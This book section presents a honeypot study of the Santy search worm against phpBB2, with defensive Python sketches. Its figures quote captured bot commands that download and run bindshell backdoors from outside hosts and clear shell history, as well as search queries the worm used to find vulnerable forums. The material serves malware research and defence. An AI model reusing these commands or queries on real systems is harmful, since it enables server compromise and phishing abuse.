
10.2. Search Worms

Another case where a specialized low-interaction honeypot proved extremely useful was a year-long study of search worms conducted by one of the authors [69]. Before we describe how a low-interaction honeypot was used here, we explain what we consider to be search worms and why they are interesting.

As worms have become more virulent, operating systems have also made many advances in containing them. For example, Windows XP SP2 limits the number of scanning connections a machine is allowed to open in parallel, effectively preventing randomly scanning worms from spreading. Recent research has also developed methods to create worm signatures quickly and to make random spreading much harder [14,101]. As a result, worm authors are looking for new ways to acquire vulnerable targets without relying on random scanning. It is often possible to find vulnerable web servers by sending carefully crafted queries to search engines. A vulnerability in a web server often allows remote execution of shell commands, which adversaries can leverage to gain complete control over the underlying host. The compromised host can then be used as a stepping stone to compromise more machines. Search worms automate this approach and spread by using popular search engines to find new targets. Because these worms no longer need to scan randomly for targets, they evade any detection mechanism that assumes random scanning. In this case study, we use Santy as an example: Santy searches for web servers running a vulnerable version of phpBB2 and directly exploits them to run more worm instances, which in turn search for more vulnerable servers [22].

One difficulty that search worms such as Santy must deal with is the fact that queries to search engines return only partial result sets. Instead of getting all possible results, the results are usually limited to include only the most important sites matching the query. This implies that search worms might get the same set of servers for each search query they attempt. To get more results, search worms change their queries by using different keywords, adding random numbers or walking deep into the result set. Nevertheless, due to the ranking inherent in the returned results, a search worm encounters many result collisions across subsequent queries that affect its propagation performance.
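The effect of ranking on result collisions can be illustrated with a small simulation. The sketch below is not taken from the study. It assumes a hypothetical search engine in which every query returns a fixed number of distinct servers, each drawn with probability proportional to 1/rank, and it counts how many of the returned results are new. The function name and all parameters are illustrative assumptions.

```python
import itertools
import random

def simulate_collisions(num_servers=10_000, results_per_query=50,
                        num_queries=20, seed=1):
    """Count total vs. unique results under a rank-biased result model.

    Assumption: every query returns `results_per_query` distinct servers,
    each drawn with probability proportional to 1/rank. Real search
    engines rank differently; this only illustrates the trend.
    """
    rng = random.Random(seed)
    servers = range(num_servers)
    # Cumulative weights let random.choices pick by bisection.
    cum_weights = list(itertools.accumulate(
        1.0 / (rank + 1) for rank in servers))
    seen = set()
    total = 0
    for _ in range(num_queries):
        page = set()
        while len(page) < results_per_query:
            page.add(rng.choices(servers, cum_weights=cum_weights, k=1)[0])
        total += len(page)
        seen.update(page)
    return total, len(seen)

total, unique = simulate_collisions()
print(f"{total} results returned, {unique} unique, "
      f"{total - unique} collisions")
```

Under this model, highly ranked servers show up in almost every result page, so the number of unique targets grows much more slowly than the number of results requested.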

In general, a search worm executes the following sequence of operations:


1.	Generate search query. This step optimizes the search query to return as many unique targets as possible. Many Santy variants come with a list of prepared queries where each is responsible for a different set of results. For example, the queries might contain different version numbers of vulnerable software packages. Other ways to increase the performance of a search query are to increase the size of the returned results or to ask for results deeper in the result set.
2.	Analyze search results. In addition to the server addresses, search engines often return additional information that needs to be pruned, such as small snippets of text or navigational links. Santy deals with this by parsing the returned HTML for URLs, ignoring all URLs that belong to the search engine itself or do not meet the expected URL format. At this point, search worms might also prune duplicate results to make sure that each host name is exploited only once.
3.	Infect identified targets. Now that the search worm is in possession of potentially vulnerable targets, it attempts to exploit them. Usually, this involves reformatting a URL to include exploit and bootstrapping code. Because the payload that can be delivered via the initial exploit is usually small, the bootstrap phase allows the search worm to download additional payloads, such as the worm binary itself, onto the compromised target machine. The installation may happen in multiple steps and often relies on infrastructure already installed on the target. For example, variations of the Santy worm try to download themselves onto the infected machine first via `wget`, then via `curl`, and finally via `fetch`. Santy variants usually also download additional applications such as bot binaries to join a bot network controlled by the adversary.

The Santy worm surfaced on December 20, 2004, and was the first search worm to propagate automatically without any human intervention [22]. It was written in Perl and exploited a bug in the phpBB bulletin board system that allowed an adversary to run arbitrary code on the web server. To find vulnerable servers to infect, it used Google to search for URLs that contain the string viewtopic.php. To infect a web server, Santy appended an exploit against phpBB2 to each URL extracted from the search results. The exploit instructed the web server to download the Santy worm from a central distribution site. Once the worm had been started, it asked the search engine for more vulnerable sites. In addition to the worm itself, all variants also downloaded another payload that connected the infected machine to an IRC bot network.

Based on our knowledge about Santy, we were ready to install a customized honeypot to capture the worm and additional payloads such as bots and rootkits. The approach we took is similar to PHP.Hop described in Section 3.6. Because Santy exploited a vulnerability in phpBB2's viewtopic.php handler, we installed a web server running a specially patched phpBB2 discussion forum. The patch simulated the vulnerability and returned fake output for a number of popular shell commands. In addition to faking the vulnerability, all attempts to download additional software onto the web server were logged and then executed in a safe environment. To protect the machine from any mistakes we might have made, the web server running the bulletin board was protected by Systrace; see Section 3.7.2.
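The patch itself is not reproduced here. As a rough illustration of the idea, the following minimal sketch shows how a honeypot might answer injected shell commands with canned output while recording download attempts. It is an assumption-laden example, not the code used in the study: the function name `emulate`, the canned responses, and the `example.invalid` URL are all made up, and nothing is ever executed.

```python
import shlex

# Canned responses are invented for illustration; a real deployment would
# mimic the output of the system the honeypot pretends to be.
FAKE_OUTPUT = {
    "id": "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n",
    "uname": "Linux\n",
    "pwd": "/var/www/phpBB2\n",
}
DOWNLOADERS = {"wget", "curl", "fetch"}

def emulate(command_line, download_log):
    """Return fake output for a shell command line; nothing is executed."""
    output = []
    # Naive split on ';' (quoted semicolons are not handled in this sketch).
    for part in command_line.split(";"):
        try:
            argv = shlex.split(part)
        except ValueError:
            continue  # unbalanced quotes: ignore this fragment
        if not argv:
            continue
        if argv[0] in DOWNLOADERS:
            # Record what the attacker wants to fetch. Arguments starting
            # with '-' are skipped; option values may still slip through.
            download_log.extend(a for a in argv[1:] if not a.startswith("-"))
        else:
            # Unknown commands silently produce no output.
            output.append(FAKE_OUTPUT.get(argv[0], ""))
    return "".join(output)

log = []
print(emulate("cd /tmp; wget http://example.invalid/bot.txt; id", log))
print(log)
```

The recorded URLs could then be fetched and examined separately in an isolated environment, in the spirit of the logging step described above.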

However, before we could catch a real worm outbreak, we had to wait for search engines to index our new forum pages. Fortunately, this did not take very long. In this context, it helps to run the forum on an already popular web server, as this usually results in a better ranking of the forum pages.

The initial botnets we observed were using a variant of Kaiten as an IRC client. We surreptitiously modified Kaiten to behave just like a normal bot but faked any DDoS or command execution capabilities. The average size of the botnets we joined was in the low thousands. Because bot networks are attractive and creating new Santy variants is easy, we have seen a large number of modifications to the original worm. Using the Santy versions captured on the honeypot, we have graphed the dependencies between different Santy variants in Figure 10.6. Each node in the graph represents a different Santy variant written in Perl and is labeled using its filename on the infected web server. To give an overview of how the Santy worm evolved over time, we first connected each variant to the month and year in which it occurred, illustrated as the bar in the middle. Two variants are connected with an edge if their difference computed via diff is minimal with respect to all other variants. As Santy is written in Perl, the number of changed lines is a reasonable measure. Across all Santy variants that we collected, the average number of line changes is about 484. The minimum number of changed lines is one, and the maximum is 1689. The most common differences are changed search queries and distribution hosts. The graph shows that some variants of Santy have been continuously modified for over six months and, based on the disconnected components, that there are possibly many different adversaries launching new variants.
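The edge rule described above can be sketched in a few lines. The example below is an illustration under stated assumptions rather than the tooling used for Figure 10.6: it uses Python's `difflib` instead of the diff utility, counts every added or removed line as one change (so a modified line counts twice), and the variant filenames and contents are invented.

```python
import difflib

def changed_lines(a, b):
    """Number of lines added or removed when turning text `a` into `b`."""
    diff = difflib.ndiff(a.splitlines(), b.splitlines())
    return sum(1 for line in diff if line.startswith(("+ ", "- ")))

def nearest_variants(variants):
    """Map each variant name to the other variant with the fewest changes."""
    edges = {}
    for name, text in variants.items():
        others = [(changed_lines(text, other_text), other)
                  for other, other_text in variants.items() if other != name]
        if others:
            edges[name] = min(others)[1]  # ties broken by filename
    return edges

# Hypothetical variants: only the query and distribution host differ.
variants = {
    "a.txt": "query one\nhost alpha\nspread\n",
    "b.txt": "query two\nhost alpha\nspread\n",
    "c.txt": "query two\nhost beta\nspread\nirc\n",
}
for name, neighbor in nearest_variants(variants).items():
    print(f"{name} -> {neighbor}")
```

Connecting each variant only to its closest neighbor yields a sparse graph whose disconnected components hint at separate lines of development.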

Figure 10.6. Based on the collection of all captured worm variants, we graphed the dependency between different Santy worms from August 2005 to May 2006. Each node in the graph is labeled by the filename downloaded to the infected host. An edge between two nodes indicates that the code differences are minimal compared to all other variants. A timeline shows how different variants have evolved over time.


Figure 10.7 shows an overview of the different queries used by just one variant of Santy. We see that the worm uses random numbers to split the result sets. Remember, we mentioned earlier that different result sets allow the worm to spread more efficiently. We also notice that the worm is using queries specifically targeting the templates provided by phpBB2. For example, View previous topic and View next topic are navigational links in the forum.

Figure 10.7. The figure shows sample queries from a Santy outbreak in 2005.

    GET /search?q="View+previous+topic+::+View+next+topic"+8756+-modules&num=50&start=35
    GET /search?q="vote+in+polls+in+this+forum"+7875+-modules&num=50&start=10
    GET /search?q="reply+to+topics+in+this+forum"+5632+-modules&num=50&start=15
    GET /search?q="Post+subject"+phpBB+6578+-modules&num=50&start=10
    GET /search?q="delete+your+posts+in+this+forum"+9805+-modules&num=50&start=35
    GET /search?q="post+new+topics+in+this+forum"+1906+-modules&num=100&start=30
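When analyzing logs of such requests, it helps to split each query into its components. The following sketch, which assumes request lines in the form shown in Figure 10.7, uses Python's standard `urllib.parse` module to extract the quoted template phrase, the random number, and the paging parameters. The function name and the returned field names are our own choices for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

def parse_santy_query(request_line):
    """Split a logged search request into phrase, random number, and paging."""
    target = request_line.split()[1]          # "GET <target> [HTTP/x.y]"
    params = parse_qs(urlsplit(target).query)  # '+' is decoded to a space
    q = params.get("q", [""])[0]
    phrase = re.search(r'"([^"]*)"', q)
    # Look for the number outside the quoted phrase only.
    rest = q.replace(phrase.group(0), "") if phrase else q
    number = re.search(r"\b(\d+)\b", rest)
    return {
        "phrase": phrase.group(1) if phrase else None,
        "random_number": int(number.group(1)) if number else None,
        "num": int(params.get("num", ["0"])[0]),
        "start": int(params.get("start", ["0"])[0]),
    }

line = ('GET /search?q="View+previous+topic+::+View+next+topic"'
        '+8756+-modules&num=50&start=35')
print(parse_santy_query(line))
```

Grouping parsed requests by phrase makes it easy to see which forum template strings a variant relies on and how it varies the number and the `start` offset to reach different parts of the result set.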

When Santy initially appeared, we created an automated process for joining the botnets if we knew which bot variant was being used. We hoped to get some additional insight into the motivations behind these attacks, especially what the compromised servers were used for. One of the benefits of a compromised web server is that it is usually connected to the Internet via a high-bandwidth link. So it was not surprising that a lot of the initial activity was focused on denial of service attacks. However, we also noticed that the attackers were installing backdoors on the compromised servers and trying to get root access, as shown in Figure 10.8.

Figure 10.8. Santy bots are being used to install backdoors on compromised hosts.

    #sdk :!FUTW SH cd /tmp/.bash_rc; wget http://org.tw/bindtty; \
        chmod +x bindtty; ./bindtty; rm -fr bindtty; history -c;
    #sdk :!FUTW SH cd /tmp; wget http://org.tw/bindtty; \
        chmod +x bindtty; ./bindtty; rm -fr bindtty; history -c;
    #sdk :!FUTW SH cd /tmp; wget http://org.tw/bindshell; \
        history -c;
    #sdk :!FUTW SH cd /tmp; chmod 755 bindshell; ./bindshell; \
        rm -f bindshell; history -c;
    #sdk :!FUTW SH cd /tmp; \
        wget http://227.160.160.12/icons/small/small/xpl.tgz; \
        tar xvzf xpl.tgz; cd kaz*; chmod +x kaz; .

Later on, we noticed that the activities were becoming more sophisticated. Instead of launching denial of service attacks, the adversaries were using the compromised web servers to send phishing e-mails. This looked like a fairly organized activity, as each web server received its own list of e-mail addresses to which to send the phishing message. An example is shown in Figure 10.9. Although we could see that the botnets were being used for sending e-mail, we were not able to gain any insight into the economic side of the phishing operation. It would have been very useful to know how much money the adversaries in this example were being paid for providing a spam e-mail service.

Figure 10.9. Santy bots are being used for sending phishing e-mails.

    #logitech :!GRATUEX SH wget host.com/xtnatz/msg.tgz; tar zxvf msg.tgz; \
        rm -rf test.txt; wget host.com/consell/test.txt; php x.php . list.txt
    #logitech :!GRATUEX SH cd /var/tmp/....; php x.php . list.txt
    #logitech :!EITQAWUU SH cd /var/tmp/...; rm -rf list.txt; \
        wget stud.usv.rr/~mihx/gamble.txt; ls
    #logitech :!EITQAWUU SH cd /var/tmp/...; mv gamble.txt list.txt; \
        rm -rf test.txt; wget geocities.com/connexseller/test.txt; ls
    #logitech :!EITQAWUU SH cd /var/tmp/...; php x.php . list.txt
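Captured channel traffic like this is easier to review once the download targets have been pulled out of each command. The sketch below assumes log lines in the form shown in Figures 10.8 and 10.9, with any continuation lines already joined. The regular expression, the function name, and the field name `token` (for the word following `!`, whose exact meaning we do not assume) are illustrative choices, not part of any bot's protocol definition.

```python
import re

# "<channel> :!<token> SH <shell command line>"
COMMAND_RE = re.compile(r"^(#\S+) :!(\S+) SH (.*)$")

def parse_bot_command(line):
    """Extract channel, token, and wget targets from one logged command."""
    match = COMMAND_RE.match(line.strip())
    if not match:
        return None
    channel, token, shell = match.groups()
    downloads = []
    for part in shell.split(";"):
        words = part.split()
        if words and words[0] == "wget":
            # Skip option flags; everything else is treated as a target.
            downloads.extend(w for w in words[1:] if not w.startswith("-"))
    return {"channel": channel, "token": token, "downloads": downloads}

sample = ("#logitech :!EITQAWUU SH cd /var/tmp/...; rm -rf list.txt; "
          "wget stud.usv.rr/~mihx/gamble.txt; ls")
print(parse_bot_command(sample))
```

Collecting the extracted targets over time gives a simple picture of which hosts distribute address lists and tools to the compromised servers.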

Another interesting development that illustrated the arms race between those who write search worms and those who defend against them came when the worm and the bot were combined into a single payload. This allowed the adversaries to update their search queries via IRC when they noticed that the current set of queries no longer worked. You can find many more details about how to defend against a search worm in the aforementioned paper [69], but we hope that this example showed that even simple techniques provided by low-interaction honeypots such as PHP.Hop can yield very interesting results.